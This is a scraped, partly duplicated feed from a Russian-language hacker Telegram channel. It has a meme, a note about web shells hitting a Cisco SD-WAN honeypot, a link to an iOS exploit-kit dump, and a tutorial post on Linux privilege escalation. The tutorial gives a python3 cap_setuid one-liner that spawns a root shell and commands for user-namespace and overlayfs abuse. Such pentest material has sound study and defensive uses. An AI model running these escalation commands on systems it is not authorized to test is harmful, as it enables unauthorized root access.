This media is not supported in your browser
VIEW IN TELEGRAM
Sexy/UNsexy software
руки на стол !!!
руки на стол !!!
🔥41👍7
UPD to https://t.iss.one/proxy_bar/3185 CVE-2026-20127
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.
👍13
Рубрика На заметку
*
*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились
Отдельные привилегии , дающие значок шерифа (например меняя UID).
Проверка capabilities:
опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID
Кстати иногда админы отдают
*
*
Namespaces Abuse
Вообще namespaces изолируют ресурсы:
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих
То есть можно:
И смонтировать overlay =
Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m
#РубрикаНаЗаметкуХакеру
$[email protected] - part 8*
*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились
Capabilities !Отдельные привилегии , дающие значок шерифа (например меняя UID).
Проверка capabilities:
getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID
Кстати иногда админы отдают
capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.*
*
Namespaces Abuse
Вообще namespaces изолируют ресурсы:
PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace
#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)
А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих
kernel privilege escalation присутствует.То есть можно:
mkdir lower upper work merged
И смонтировать overlay =
OverlayFS/FUSE/kernel permission bypassВообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m
#РубрикаНаЗаметкуХакеру
🔥13👍11
Внутри Coruna: реверс-инжиниринг государственного набора эксплойтов для iOS from JavaScript
*
Research
*
DownLoad Coruna DUMP
*
Research
*
DownLoad Coruna DUMP
🔥16😱9